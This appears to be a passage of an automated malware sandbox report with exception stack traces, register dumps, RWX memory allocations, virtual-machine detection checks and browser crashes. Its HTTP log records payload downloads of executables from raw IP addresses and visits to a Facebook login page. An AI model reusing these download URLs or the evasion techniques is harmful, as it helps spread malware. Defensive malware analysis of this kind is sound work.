IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x72a452ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x72b20ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 69720024 registers.edi: 1974991376 registers.eax: 69720024 registers.ebp: 69720104 registers.edx: 1 registers.ebx: 5114356 registers.esi: 2147746133 registers.ecx: 3510243923	1
__exception__ Jan. 17, 2024, 7:59 a.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 244904968 registers.r15: 83455680 registers.rcx: 1300 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 244904224 registers.rsp: 244903928 registers.r11: 244907840 registers.r8: 2004779404 registers.r9: 0 registers.rdx: 1356 registers.r12: 244904584 registers.rbp: 244904080 registers.rdi: 85441600 registers.rax: 11075584 registers.r13: 83354272	1
__exception__ Jan. 17, 2024, 7:59 a.m.	stacktrace: 0xcd1f04 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 69 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd1f04 registers.r14: 8974696 registers.r15: 8791380629104 registers.rcx: 48 registers.rsi: 8791380560768 registers.r10: 0 registers.rbx: 0 registers.rsp: 8974328 registers.r11: 8977712 registers.r8: 2004779404 registers.r9: 0 registers.rdx: 8796092883536 registers.r12: 14917056 registers.rbp: 8974448 registers.rdi: 205627424 registers.rax: 13442816 registers.r13: 8975288	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.68/mine/amer.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.68/mine/amer.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://109.107.182.3/cost/go.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://109.107.182.3/cost/go.exe

Performs some HTTP requests (23 events)

request	HEAD http://185.215.113.68/mine/amer.exe
request	GET http://185.215.113.68/mine/amer.exe
request	HEAD http://109.107.182.3/cost/go.exe
request	GET http://109.107.182.3/cost/go.exe
request	GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request	GET https://db-ip.com/demo/home.php?s=175.208.134.152
request	GET https://www.facebook.com/login
request	GET https://static.xx.fbcdn.net/rsrc.php/v3/y1/r/0_HoU29ShlI.js?_nc_x=Ij3Wp8lg5Kz
request	GET https://static.xx.fbcdn.net/rsrc.php/v3/y2/l/0,cross/7_6o7HJ05F8.css?_nc_x=Ij3Wp8lg5Kz
request	GET https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0,cross/om552iOCRxJ.css?_nc_x=Ij3Wp8lg5Kz
request	GET https://static.xx.fbcdn.net/rsrc.php/v3/y5/l/0,cross/QoWVNltU_ZO.css?_nc_x=Ij3Wp8lg5Kz
request	GET https://static.xx.fbcdn.net/rsrc.php/v3/ya/l/0,cross/EQ0cyse2DGv.css?_nc_x=Ij3Wp8lg5Kz
request	GET https://static.xx.fbcdn.net/rsrc.php/v3/yr/l/0,cross/wMc7fNlPdnA.css?_nc_x=Ij3Wp8lg5Kz
request	GET https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg
request	GET https://facebook.com/security/hsts-pixel.gif?c=3.2.5
request	GET https://static.xx.fbcdn.net/rsrc.php/v3/yE/r/xGzxHIbkRpC.js?_nc_x=Ij3Wp8lg5Kz
request	GET https://fbcdn.net/security/hsts-pixel.gif?c=2.5
request	GET https://static.xx.fbcdn.net/rsrc.php/v3/yK/r/Lzd-U--zeLf.js?_nc_x=Ij3Wp8lg5Kz
request	GET https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/Y0L6f5sxdIV.png
request	GET https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/O7nelmd9XSI.png
request	GET https://fbsbx.com/security/hsts-pixel.gif?c=5
request	GET https://connect.facebook.net/security/hsts-pixel.gif
request	GET https://www.facebook.com/favicon.ico

Allocates read-write-execute memory (usually to unpack itself) (50 out of 532 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2724 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2724 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02710000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2724 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00740000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2724 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00760000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2724 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00770000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2724 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02714000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2724 region_size: 81920 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02724000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2724 region_size: 147456 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02724000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2724 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02744000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2724 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02754000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2724 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02754000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2724 region_size: 131072 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02754000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2724 region_size: 81920 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02774000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2724 region_size: 49152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02744000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2832 region_size: 11341824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a90000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2832 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03560000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7561c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7563c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7561c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7563c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d33000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73dd7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76af9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75ac2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75602000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2832 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02d30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:07 a.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74211000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2912 region_size: 8851456 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7561c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7563c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7561c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7563c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d33000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73dd7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76af9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75ac2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75602000 process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (19 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW Jan. 17, 2024, 8:05 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 17, 2024, 8:05 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 17, 2024, 8:05 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 17, 2024, 8:05 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 17, 2024, 8:05 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 17, 2024, 8:05 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 17, 2024, 8:05 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 17, 2024, 8:05 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 17, 2024, 8:05 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 17, 2024, 8:05 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 17, 2024, 8:05 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 17, 2024, 8:05 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 17, 2024, 8:05 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 17, 2024, 8:05 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 17, 2024, 8:05 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 17, 2024, 8:05 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 17, 2024, 8:05 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 17, 2024, 8:05 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 17, 2024, 8:05 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1

An application raised an exception which may be indicative of an exploit crash (7 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process iexplore.exe with pid 2832 crashed
Application Crash	Process chrome.exe with pid 2460 crashed
Application Crash	Process firefox.exe with pid 2512 crashed
__exception__ Jan. 17, 2024, 8:07 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 101903668 registers.edi: 4802884 registers.eax: 101903668 registers.ebp: 101903748 registers.edx: 547401 registers.ebx: 101904032 registers.esi: 2147746133 registers.ecx: 88264024	1	0	0
